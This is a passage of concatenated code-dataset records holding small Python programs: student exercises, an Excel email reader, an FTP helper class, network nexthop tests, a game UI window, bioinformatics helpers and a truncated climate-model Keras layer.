dado3\ndinheiros=10\ndica=0\nchute=0\n\n#fase de dicas\n\nwhile(dica!='não'): \n resposta_perdeu= (\"Você perdeu!\")\n print(dinheiros)\n if dinheiros == 0:\n print (resposta_perdeu)\n else:\n dica=(\"você quer uma dica?\")\n if dica == \"sim\":\n n1=input(\"digite um número\")\n n2=input(\"digite um número\")\n n3=input(\"digite um número\")\n if n1 == dados or n2==dados or n3==dados :\n print (\"Está entre os 3\")\n else:\n print(\"Não está entre os 3\")\n dinheiros -=1\n#fase chutes:\n \nwhile(chute != dados):\n resposta_ganhou=(\"você ganhou com [0]\" .format (dinheiros))\n resposta_perdeu= (\"Você perdeu!\") \n print(dinheiros)\n if dinheiros == 0:\n print (resposta_perdeu)\n else:\n chute=input(\"Chute um número\")\n if chute != dados:\n dinheiros -=1\n else:\n dinheiros += dinheiros*5\n print (resposta_ganhou)","sub_path":"backup/user_212/ch136_2020_04_01_12_27_19_355004.py","file_name":"ch136_2020_04_01_12_27_19_355004.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"565170321","text":"#pip install openpyxl\nimport openpyxl as oxl\n\nexcel = oxl.load_workbook('emails.xlsx')\ndata = excel['Sheet1']\n\nlast_row = data.max_row\n\nemails = []\nnames = []\n\nfor i in range(2, last_row+1):\n flag = data.cell(row=i, column=3).value\n if flag !='N':\n names.append(data.cell(row=i, column=1).value)\n\nfor i in range(2, last_row+1):\n flag = data.cell(row=i, column=3).value\n if flag !='N':\n emails.append(data.cell(row=i, column=2).value)\n\nprint(names)\nprint(emails)","sub_path":"Working with Email/3_3-working_with_excel.py","file_name":"3_3-working_with_excel.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"521416569","text":"import sys\nfrom ftplib import FTP\nfrom ftplib import all_errors\nimport logging\n\n\nclass MyFTP:\n def __init__(self, ftp_host):\n self.ftp = FTP(ftp_host)\n\n def connect(self, user_name, password):\n try:\n resp = self.ftp.login(user=user_name, passwd=password)\n logging.info(resp)\n return \"230\" in resp\n except all_errors as e:\n logging.error(e)\n sys.exit(1)\n\n def check_files_count_in_current_directory(self):\n files = []\n self.ftp.retrlines(\"LIST\", files.append)\n return len(files)\n\n def is_file_in_current_directory(self, filename):\n directory = []\n self.ftp.retrlines(\"LIST\", directory.append)\n for file in directory:\n if filename in file:\n return True\n return False\n\n def upload_file(self, filename):\n with open(filename, \"rb\") as f:\n try:\n resp = self.ftp.storbinary(\"\".join([\"STOR \", filename]), f)\n logging.info(resp)\n return \"226\" in resp\n except all_errors as e:\n logging.error(e)\n return False\n\n def download_file(self, filename, download_filename):\n with open(download_filename, 'wb') as f:\n try:\n resp = self.ftp.retrbinary(\"\".join([\"RETR \", filename]), f.write)\n logging.info(resp)\n return \"226\" in resp\n except all_errors as e:\n logging.error(e)\n return False\n\n def create_dir(self, dirname):\n try:\n resp = self.ftp.mkd(dirname)\n logging.info(resp)\n except all_errors as e:\n logging.error(e)\n return False\n\n def delete_dir(self, dirname):\n try:\n resp = self.ftp.rmd(dirname)\n logging.info(resp)\n except all_errors as e:\n logging.error(e)\n return False\n\n def change_dir(self, dirname):\n try:\n resp = self.ftp.cwd(dirname)\n logging.info(resp)\n except all_errors as e:\n logging.error(e)\n return False\n\n def get_current_dir(self):\n logging.info(self.ftp.pwd())\n return self.ftp.pwd()\n\n def close(self):\n self.ftp.close()\n","sub_path":"Lesson21/task2/my_ftplib.py","file_name":"my_ftplib.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"302504434","text":"import os, sys, subprocess, re, time\nfrom pprint import pprint\n\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nthis_dir = os.path.dirname(os.path.realpath(__file__))\nref_file = '%s/nexthop-group.ref' % (this_dir)\n\n\ndef test_read_nhgs():\n \"\"\"Testing if the kernel nexthops were read in properly.\"\"\"\n\n print(\"\\n\\n** Verifying nexthops read from kernel\")\n print(\"*******************************************\\n\")\n\n print(\"Verify show nexthop-group\")\n print(\"-------------------------\\n\")\n\n result = str(subprocess.getoutput('vtysh -c \"show nexthop-group\"'))\\\n .expandtabs(8)\n\n with open(ref_file) as f:\n groups = f.read().strip().rsplit('\\n\\n')\n for group in groups:\n print(group)\n assert group in result,\\\n (\n \"\\nExpected\"\n \"\\n----------\"\n \"\\n%s\"\n \"\\nActual\"\n \"\\n----------\"\n \"\\n%s\"\\\n % (group, result)\\\n )\n\ndef test_del_nhg():\n \"\"\"Testing delete nexthop still used re-install.\"\"\"\n\n print(\"\\n\\n** Verifying nexthop still used re-install\")\n print(\"*******************************************\\n\")\n\n with open(ref_file) as f:\n # Delete a nexthop still being referenced\n groups = f.read().strip().rsplit('\\n\\n')\n g_id = 0\n g_refcnt = 0\n\n for group in groups:\n g_id = int(re.findall(r'(?:ID: )([0-9]+)', group)[0])\n g_refcnt = int(re.findall(r'(?:RefCnt: )([0-9]+)', group)[0])\n if g_refcnt:\n break\n\n subprocess.run('ip next del id %d' % g_id, shell=True)\n time.sleep(2)\n result = str(subprocess.getoutput('ip next ls'))\n assert str(g_id) in result\n","sub_path":"tests/nhgs/test_nhgs.py","file_name":"test_nhgs.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"533588380","text":"#Find Digits\r\n\r\ntest=int(input())\r\nli=[None]*test\r\ncount=[None]*test\r\ncount=0\r\nfor i in range(0,test):\r\n li[i]=int(input())\r\n\r\ndef mod(x):\r\n count=0\r\n back=x\r\n while x>0:\r\n rem=x%10\r\n if rem != 0 and back%rem == 0:\r\n count=count+1\r\n x=x//10\r\n return count\r\n\r\nl=list(map(mod,li))\r\n\r\nfor i in range(0,test):\r\n print(l[i])\r\n","sub_path":"New folder/Divisibility by digits.py","file_name":"Divisibility by digits.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"342308435","text":"import ui\nimport chat\nimport app\nimport fgGHGjjFHJghjfFG1545gGG\nimport snd\nimport item\nimport GFHhg54GHGhh45GHGH\nimport uiToolTip \nimport wndMgr \nimport time\nimport grp\nimport mouseModule \nimport constInfo\nimport event\nimport settinginfo\n\nclass AchievementStatisticBoard(ui.ScriptWindow):\n\tfaceBoxIMG \t\t= {}\n\tfaceBoxBGIMG \t= {} \n\tDescThinBoard \t= {}\n\t\n\tAchievementTitle \t\t= {}\n\tAchievementText \t\t= {}\n\tAchievementCalcPoints\t= {}\n\t\n\tcat = 0\n\tdef __init__(self):\n\t\tui.ScriptWindow.__init__(self)\n\t\tself.LoadUI()\n\n\tdef __del__(self):\n\t\t#constInfo.CALOPEN = 1\n\t\tsettinginfo.Achievement_Statistic[\"status\"] = 0\n\t\tui.ScriptWindow.__del__(self)\n\t\tself.Board.Hide()\n\t\t\n\tdef LoadUI(self):\n\t\tsettinginfo.Achievement_Statistic[\"status\"] = 1\n\t\tself.Board = ui.BoardWithTitleBar()\n\t\tself.Board.SetSize(266, 415) # 266\n\t\tself.Board.SetCenterPosition()\n\t\tself.Board.AddFlag(\"movable\")\n\t\tself.Board.AddFlag(\"float\")\n\t\tself.Board.SetTitleName(\"Achievement-Statistik\")\n\t\tself.Board.SetCloseEvent(self.__del__)\n\t\tself.Board.Show()\n\n\t\tself.itemtooltip = uiToolTip.ItemToolTip() \n\t\tself.itemtooltip.HideToolTip()\t\n\n\t\tself.BossButtonUp = ui.Button()\n\t\tself.BossButtonUp.SetParent(self.Board)\n\t\tself.BossButtonUp.SetPosition(16,33)\n\t\tself.BossButtonUp.SetText(\"\")\n\t\tself.BossButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.BossButtonUp.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.BossButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 1)\n\t\tself.BossButtonUp.Hide()\n\t\t\n\t\tself.BossButtonDown = ui.Button()\n\t\tself.BossButtonDown.SetParent(self.Board)\n\t\tself.BossButtonDown.SetPosition(16,33)\n\t\tself.BossButtonDown.SetText(\"\")\n\t\tself.BossButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.BossButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 1)\n\t\tself.BossButtonDown.Show()\n\t\t\n\t\tself.MetinButtonUp = ui.Button()\n\t\tself.MetinButtonUp.SetParent(self.Board)\n\t\tself.MetinButtonUp.SetPosition(95,33)\n\t\tself.MetinButtonUp.SetText(\"\")\n\t\tself.MetinButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.MetinButtonUp.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.MetinButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 2)\n\t\tself.MetinButtonUp.Show()\t\n\t\t\n\t\tself.MetinButtonDown = ui.Button()\n\t\tself.MetinButtonDown.SetParent(self.Board)\n\t\tself.MetinButtonDown.SetPosition(95,33)\n\t\tself.MetinButtonDown.SetText(\"\")\n\t\tself.MetinButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.MetinButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 2)\n\t\tself.MetinButtonDown.Hide()\n\t\t\n\t\tself.DungeonsButtonUp = ui.Button()\n\t\tself.DungeonsButtonUp.SetParent(self.Board)\n\t\tself.DungeonsButtonUp.SetPosition(174,33)\n\t\tself.DungeonsButtonUp.SetText(\"\")\n\t\tself.DungeonsButtonUp.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_01.sub\")\n\t\tself.DungeonsButtonUp.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_02.sub\")\n\t\tself.DungeonsButtonUp.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonUp.SetEvent(ui.__mem_func__(self.ChangeActionMode), 3)\n\t\tself.DungeonsButtonUp.Show()\t\n\t\t\n\t\tself.DungeonsButtonDown = ui.Button()\n\t\tself.DungeonsButtonDown.SetParent(self.Board)\n\t\tself.DungeonsButtonDown.SetPosition(174,33)\n\t\tself.DungeonsButtonDown.SetText(\"\")\n\t\tself.DungeonsButtonDown.SetUpVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetOverVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetDownVisual(\"d:/ymir work/ui/game/windows/tab_button_large_03.sub\")\n\t\tself.DungeonsButtonDown.SetEvent(ui.__mem_func__(self.ChangeActionMode), 3)\n\t\tself.DungeonsButtonDown.Hide()\n\n\t\tself.scrollbar = ui.ScrollBar()\n\t\tself.scrollbar.SetParent(self.Board)\n\t\tself.scrollbar.SetScrollBarSize(340)\n\t\tself.scrollbar.SetPosition(255, 55)\t\n\t\tself.scrollbar.SetMiddleBarSize(float(5) / float(7))\n\t\tself.scrollbar.SetScrollEvent(self.__OnScroll)\n\t\tself.scrollbar.Hide()\n\t\t\n\t\tself.ButtonTextLines = ui.TextLine()\n\t\tself.ButtonTextLines.SetParent(self.Board)\n\t\tself.ButtonTextLines.SetPosition(30,36)\n\t\tself.ButtonTextLines.SetText(\" Bosse Metins Dungeons\")\n\t\tself.ButtonTextLines.Show()\t\n\n\t\tself.SplitTitleBar = ui.HorizontalBar()\n\t\tself.SplitTitleBar.SetParent(self.Board)\n\t\tself.SplitTitleBar.Create(235)\n\t\tself.SplitTitleBar.SetPosition(16,55)\n\t\tself.SplitTitleBar.Show()\n\t\t\n\t\tself.AchievementError = ui.TextLine()\n\t\tself.AchievementError.SetParent(self.Board)\n\t\tself.AchievementError.SetPosition(133,80)\n\t\tself.AchievementError.SetFontColor(0.9607, 0.2392, 0.0)\n\t\tself.AchievementError.SetText(\"Es wurden keine Achievements gefunden!\")\n\t\tself.AchievementError.SetHorizontalAlignCenter()\n\t\tself.AchievementError.Hide()\n\n\t\t\t\n\t\ti = 0\n\t\theight = 75\n\t\tmax_box = 5\n\t\t\n\t\twhile i < max_box:\n\t\t\n\t\t\tself.faceBoxIMG[i] = ui.ImageBox()\n\t\t\tself.faceBoxIMG[i].SetParent(self.Board)\n\t\t\tself.faceBoxIMG[i].SetPosition(17,height)\n\t\t\tself.faceBoxIMG[i].LoadImage(\"d:/ymir work/ui/game/windows/box_face.sub\")\n\t\t\tself.faceBoxIMG[i].Show()\n\n\t\t\t\n\t\t\tself.DescThinBoard[i] = ui.ThinBoard()\n\t\t\tself.DescThinBoard[i].SetParent(self.Board)\n\t\t\tself.DescThinBoard[i].SetPosition(70,height)\n\t\t\tself.DescThinBoard[i].SetSize(180,60)\n\t\t\tself.DescThinBoard[i].Show()\n\t\t\t\n\t\t\tself.AchievementTitle[i] = ui.TextLine()\n\t\t\tself.AchievementTitle[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementTitle[i].SetPosition(90,5)\n\t\t\tself.AchievementTitle[i].SetFontColor(0.9607, 0.2392, 0.0)\n\t\t\tself.AchievementTitle[i].SetText(\"Metin des Kummers\")\n\t\t\tself.AchievementTitle[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementTitle[i].Show()\n\t\t\t\n\t\t\tself.AchievementText[i] = ui.TextLine()\n\t\t\tself.AchievementText[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementText[i].SetPosition(90,20)\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: 30.000 | Punkte: 10\")\n\t\t\tself.AchievementText[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementText[i].Show()\t\n\t\t\t\n\t\t\tself.AchievementCalcPoints[i] = ui.TextLine()\n\t\t\tself.AchievementCalcPoints[i].SetParent(self.DescThinBoard[i])\n\t\t\tself.AchievementCalcPoints[i].SetPosition(90,35)\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: 13.400.032\")\n\t\t\tself.AchievementCalcPoints[i].SetHorizontalAlignCenter()\n\t\t\tself.AchievementCalcPoints[i].Show()\t\t\t\n\n\t\t\theight = height + 65\n\t\t\ti = i + 1\n\t\t\n\t\tself.cat = 1\n\t\tself.ClearBoards()\n\t\tself.LoadCategory()\n\t\t\n\tdef LoadCategory(self):\n\t\tself.ClearBoards()\n\t\t\n\t\tif len(settinginfo.Achievement_Statistic[self.cat]) == 0:\n\t\t\t\n\t\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"NoAchievements: \" + str(self.cat) + \" Count: \" + str(len(settinginfo.Achievement_Statistic[self.cat])))\n\t\t\n\t\t\tself.Board.SetSize(266, 415) \n\t\t\tself.scrollbar.Hide()\n\t\t\tself.AchievementError.Show()\n\t\t\treturn\n\t\t\t\n\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"StartListing\")\n\t\tfor i in xrange(min(len(settinginfo.Achievement_Statistic[self.cat]),5)):\n\t\t\tcmd = settinginfo.Achievement_Statistic[self.cat][i].split(\"#\")\n\n\t\t\tself.AchievementTitle[i].SetText(self.GetAchievementName(int(cmd[0])))\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: \" + constInfo.NumberToPointString(int(cmd[1])) + \" | Punkte: \" + constInfo.NumberToPointString(int(cmd[2])))\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: \" + constInfo.NumberToPointString(int(cmd[3])))\n\n\t\t\tself.faceBoxIMG[i].Show()\n\t\t\tself.DescThinBoard[i].Show()\t\n\n\t\tif len(settinginfo.Achievement_Statistic[self.cat]) > 5:\n\t\t\tself.Board.SetSize(285, 415) \n\t\t\tself.scrollbar.SetPos(0)\n\t\t\tself.scrollbar.SetMiddleBarSize(float(5) / float(len(settinginfo.Achievement_Statistic[self.cat])))\n\t\t\tself.scrollbar.Show()\t\n\t\telse:\n\t\t\tself.Board.SetSize(266, 415) \n\t\t\tself.scrollbar.Hide()\t\t\t\n\t\t\n\t\tself.AchievementError.Hide()\n\t\t\n\tdef GetAchievementName(self,index):\n\t\tif index in settinginfo.Achievement_Names:\n\t\t\treturn settinginfo.Achievement_Names[index]\n\t\telse:\n\t\t\treturn str(index)\t\t\n\t\t\n\tdef __OnScroll(self):\n\t\tpos = int(self.scrollbar.GetPos() * (len(settinginfo.Achievement_Statistic[self.cat]) - 5)) ##Aktuelle Position der Scrollbar\n\t\t#self.Board.SetTitleName(\"Achievement-Statistik (Pos: \" + str(pos) + \")\")\n\t\tfor i in xrange(5):\n\t\t\trealPos = i + pos\n\t\t\t\n\t\t\tcmd = settinginfo.Achievement_Statistic[self.cat][realPos].split(\"#\")\n\n\t\t\tself.AchievementTitle[i].SetText(self.GetAchievementName(int(cmd[0])))\n\t\t\tself.AchievementText[i].SetText(\"Anzahl: \" + constInfo.NumberToPointString(int(cmd[1])) + \" | Punkte: \" + constInfo.NumberToPointString(int(cmd[2])))\n\t\t\tself.AchievementCalcPoints[i].SetText(\"Bisher erhaltene Punkte: \" + constInfo.NumberToPointString(int(cmd[3])))\n\t\t\ttry:\n\t\t\t\tself.faceBoxIMG[i].LoadImage(\"images_achievement/\" + str(cmd[0]) + \".tga\")\n\t\t\texcept:\n\t\t\t\tself.faceBoxIMG[i].LoadImage(\"images_achievement/unknown.tga\")\n\n\tdef ClearBoards(self):\n\t\ti = 0\n\t\tmax_box = 5\n\t\twhile i < max_box:\n\t\t\tself.faceBoxIMG[i].Hide()\n\t\t\tself.DescThinBoard[i].Hide()\n\t\t\ti = i + 1\n\t\n\tdef ChangeActionMode(self,idx):\n\t\tif self.cat == idx:\n\t\t\treturn\n\t\t\t\n\t\tif idx == 1:\n\t\t\tself.BossButtonUp.Hide()\n\t\t\tself.BossButtonDown.Show()\n\t\t\t\n\t\t\tself.MetinButtonUp.Show()\n\t\t\tself.MetinButtonDown.Hide()\n\n\t\t\tself.DungeonsButtonUp.Show()\n\t\t\tself.DungeonsButtonDown.Hide()\t\t\t\n\t\t\t\n\n\t\telif idx == 2:\n\t\t\tself.BossButtonUp.Show()\n\t\t\tself.BossButtonDown.Hide()\n\t\t\t\n\t\t\tself.MetinButtonUp.Hide()\n\t\t\tself.MetinButtonDown.Show()\n\n\t\t\tself.DungeonsButtonUp.Show()\n\t\t\tself.DungeonsButtonDown.Hide()\t\t\t\n\t\t\n\t\telif idx == 3:\n\t\t\tself.BossButtonUp.Show()\n\t\t\tself.BossButtonDown.Hide()\n\t\t\t\n\t\t\tself.MetinButtonUp.Show()\n\t\t\tself.MetinButtonDown.Hide()\n\n\t\t\tself.DungeonsButtonUp.Hide()\n\t\t\tself.DungeonsButtonDown.Show()\t\t\t\n\t\t\n\t\tself.cat = idx\n\t\t#chat.AppendChat(chat.CHAT_TYPE_INFO,\"ChangeActionMode: \" + str(self.cat))\n\t\tself.LoadCategory()\n\t\n\tdef OnPressEscapeKey(self):\n\t\tself.__del__()\n\t\treturn TRUE\n\n\tdef OnPressExitKey(self):\t\t\n\t\tself.__del__()\n\t\treturn TRUE\t\t\t\n#AchievementStatisticBoard().Show()","sub_path":"root/old_stuff/locutosachievementstat.py","file_name":"locutosachievementstat.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"205581292","text":"# Debug function getSumOfDigits that takes positive integer to calculate sum of it's digits.\n# Assume that argument is an integer.\n\ndef get_sum_of_digits(num) : \n sum = 0\n digits = list(str(num))\n for x in digits:\n sum = sum + int(x)\n return sum\n\nprint(get_sum_of_digits(1337))\n","sub_path":"kyu7-3.py","file_name":"kyu7-3.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"224479121","text":"'''\nCreated on Feb 5, 2018\n\n@author: mmp\n'''\nDNA_BASES = ['A', 'C', 'T', 'G', 'U']\n\ndef reverse(sequence):\n\treturn sequence[::-1]\n\t\ndef complement(sequence):\n\tsz_return = ''\n\tfor base in sequence:\n\t\tif (base == 'A' or base == 'a'): sz_return += 'T'\n\t\telif (base == 'C' or base == 'c'): sz_return += 'G'\n\t\telif (base == 'G' or base == 'g'): sz_return += 'C'\n\t\telif (base == 'T' or base == 't' or base == 'U' or base == 'u'): sz_return += 'A'\n\t\telse: sz_return += base\n\treturn sz_return\n\t\ndef clean_fasta(sequence):\n\t\"\"\"\n\tclean fasta, remove all letters unless ACTG\n\t\"\"\"\n\tseq_return = \"\"\n\tfor i in sequence:\n\t\tif i.upper() in DNA_BASES:\n\t\t\tseq_return += i.upper()\n\treturn seq_return\n\nif __name__ == \"__main__\":\n\tseq = 'accatatatagasfwefwgaggagattgq'\n\tseq_cleaned = clean_fasta(seq)\n\tprint(seq_cleaned)\n\n\tprint('reverse:', reverse(seq_cleaned))\t\n\tprint('reverse complement:', complement(reverse(seq_cleaned)))\n\tprint('original reverse complement:', complement(reverse(seq)))\n\t\n\t### count dna bases\n\tprint('Count bases')\n\tfor base in DNA_BASES:\n\t\tprint('{} -> {}'.format(base, seq_cleaned.count(base)))\n\n","sub_path":"day_3/second_module.py","file_name":"second_module.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"417764056","text":"\"\"\"\nЗадача 4. Вариант 2.\n\nНапишите программу, которая выводит имя,\n под которым скрывается Михаил Евграфович Салтыков.\nДополнительно необходимо вывести область интересов указанной личности,\n место рождения, годы рождения и смерти (если человек умер),\n вычислить возраст на данный момент (или момент смерти).\nДля хранения всех необходимых данных требуется использовать переменные.\nПосле вывода информации программа должна дожидаться\n пока пользователь нажмет Enter для выхода.\n\nALEKSEEV N.S.\n24 september 2018\n\"\"\"\n\n\nnicname = \"Н. Щедрин\"\na = \"прозаик\"\nhome = \"село Спас-Угол, Калязинский уезд, Тверская губерния\"\nlife_deth = \"1826-1889\"\nlife = 1826\ndeth = 1889\n\nprint(\"Михаил Евграфович Салтыков -\", nicname, a, \"родился -\", home)\nprint(\"Годы жизни -\", life_deth)\nprint(\"Возраст -\", deth - life)\n\ninput(\"\\n\\nДля выхода нажмите Enter\")\n","sub_path":"python/homework/task_4_2.py","file_name":"task_4_2.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"248505642","text":"import sys\nsys.stdin = open(\"미생물 격리_input.txt\")\n\ndef iswall(y, x):\n if y == 0 or x == 0 or y == N-1 or x == N-1:\n return True\n return False\n\nT = int(input())\nfor tc in range(1, T+1):\n N, M, K = map(int, input().split())\n table = [list(map(int, input().split())) for i in range(K)]\n\n coordinate = []\n status = []\n for i in range(K):\n coordinate.append(table[i][:2])\n status.append(table[i][2:4])\n # print(coordinate)\n # print(status)\n\n t = 0\n while True:\n\n if t == M:\n result = 0\n for i in range(len(status)):\n result += status[i][0]\n print(\"#{} {}\".format(tc, result))\n break\n\n # 1시간 경과, 좌표 이동\n t += 1\n for i in range(len(coordinate)):\n if status[i][1] == 1:\n coordinate[i][0] -= 1\n elif status[i][1] == 2:\n coordinate[i][0] += 1\n elif status[i][1] == 3:\n coordinate[i][1] -= 1\n elif status[i][1] == 4:\n coordinate[i][1] += 1\n\n # 가장자리에 군집이 있을 경우\n b = [0, 2, 1, 4, 3]\n for i in range(len(coordinate)):\n if iswall(coordinate[i][0], coordinate[i][1]):\n status[i][0] = status[i][0] // 2\n status[i][1] = b[status[i][1]]\n\n # 동일한 좌표에 군집이 있을 경우 병합\n duplicate = []\n new_coordinate = []\n new_status = []\n for i in range(len(coordinate)):\n if status[i][0] != 0:\n # if coordinate[i] not in new_coordinate:\n # new_coordinate.append(coordinate[i])\n # new_status.append(status[i])\n # else:\n # duplicate.append(coordinate[i])\n\n if coordinate.count(coordinate[i]) > 1:\n if coordinate[i] not in duplicate:\n duplicate.append(coordinate[i])\n else:\n new_coordinate.append(coordinate[i])\n new_status.append(status[i])\n\n for i in range(len(duplicate)):\n sum_counts = 0\n max_counts = 0\n for j in range(len(coordinate)):\n if duplicate[i] == coordinate[j]:\n if status[j][0] > max_counts:\n max_counts = status[j][0]\n direction = status[j][1]\n sum_counts += status[j][0]\n\n new_coordinate.append(duplicate[i])\n new_status.append([sum_counts, direction])\n\n coordinate = new_coordinate\n status = new_status\n\n\n\n\n\n\n\n\n\n\n","sub_path":"algorithm/SW 역량테스트 준비/삼성 신입 모의 SW 역량테스트 문제/미생물 격리.py","file_name":"미생물 격리.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"237352727","text":"from cbrain.imports import *\nfrom cbrain.data_generator import *\nfrom cbrain.cam_constants import *\nfrom cbrain.losses import *\nfrom cbrain.utils import limit_mem\nfrom cbrain.layers import *\nimport tensorflow as tf\nimport tensorflow.math as tfm\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.models import *\nimport xarray as xr\nimport numpy as np\nfrom cbrain.model_diagnostics import ModelDiagnostics\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\nTRAINDIR = '/local/Tom.Beucler/SPCAM_PHYS/'\nDATADIR = '/project/meteo/w2w/A6/S.Rasp/SP-CAM/fluxbypass_aqua/'\nPREFIX = '8col009_01_'\n\nPREFIXDS = PREFIX\nos.chdir('/filer/z-sv-pool12c/t/Tom.Beucler/SPCAM/CBRAIN-CAM')\n\nclass MassConsLayer_choice(Layer):\n def __init__(self, inp_sub, inp_div, norm_q, hyai, hybi, lvl_choice, **kwargs):\n \"\"\"\n Call using ([input, output])\n Assumes\n prior: [PHQ_nores, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Returns\n post(erior): [PHQ, PHCLDLIQ, PHCLDICE, TPHYSTND_nores,\n QRL, QRS, DTVKE, FSNT, FSNS, FLNT, FLNS, PRECT, PRECTEND, PRECST, PRECSTEN]\n Added lvl_choice, a hyper-parameter to choose the level of mass conservation [0-29]\n \"\"\"\n self.inp_sub, self.inp_div, self.norm_q, self.hyai, self.hybi = \\\n np.array(inp_sub), np.array(inp_div), np.array(norm_q), np.array(hyai), np.array(hybi)\n self.lvl_choice = np.int32(lvl_choice)\n # Define variable indices here\n # Input\n self.PS_idx = 300\n self.LHFLX_idx = 303\n # Output\n self.PHQbef_idx = slice(0, self.lvl_choice) # Indices before the residual\n self.PHCLDLIQ_idx = slice(29, 59)\n self.PHCLDICE_idx = slice(59, 89)\n self.PRECT_idx = 212\n self.PRECTEND_idx = 213\n\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n super().build(input_shape)\n\n def get_config(self):\n config = {'inp_sub': list(self.inp_sub), 'inp_div': list(self.inp_div),\n 'norm_q': list(self.norm_q), 'hyai': list(self.hyai),\n 'hybi': list(self.hybi), 'lvl_choice':self.lvl_choice}\n base_config = super().get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def call(self, arrs):\n inp, prior = arrs\n\n # 1. Compute dP_tilde\n dP_tilde = compute_dP_tilde(\n inp[:, self.PS_idx],\n self.inp_div[self.PS_idx], self.inp_sub[self.PS_idx],\n self.norm_q, self.hyai, self.hybi\n )\n\n # 2. Compute vertical cloud water integral\n CLDINT = K.sum(dP_tilde *\n (prior[:, self.PHCLDLIQ_idx] + prior[:, self.PHCLDICE_idx]),\n axis=1)\n\n # 3. Compute water vapor integral minus the water vapor residual\n # Careful with handling the pressure vector since it is not aligned\n # with the prior water vapor vector\n VAPINT = K.sum(dP_tilde[:, self.PHQbef_idx] * prior[:, self.PHQbef_idx], 1) +\\\n K.sum(dP_tilde[:, self.lvl_choice+1:30] * prior[:, self.lvl_choice:29], 1)\n\n # 4. Compute forcing (see Tom's note for details, I am just copying)\n LHFLX = (inp[:, self.LHFLX_idx] * self.inp_div[self.LHFLX_idx] +\n self.inp_sub[self.LHFLX_idx])\n PREC = prior[:, self.PRECT_idx] + prior[:, self.PRECTEND_idx]\n\n # 5. Compute water vapor tendency at level lvl_choice as residual\n PHQ_LVL = (LHFLX - PREC - CLDINT - VAPINT) / dP_tilde[:, self.lvl_choice]\n\n # 6. Concatenate output vector\n post = tf.concat([\n prior[:, self.PHQbef_idx], PHQ_LVL[:, None],\n prior[:, self.lvl_choice:]\n ], axis=1)\n return post\n\n def compute_output_shape(self, input_shape):\n \"\"\"Input shape + 1\"\"\"\n return (input_shape[0][0], input_shape[0][1] + 1)\n \nclass 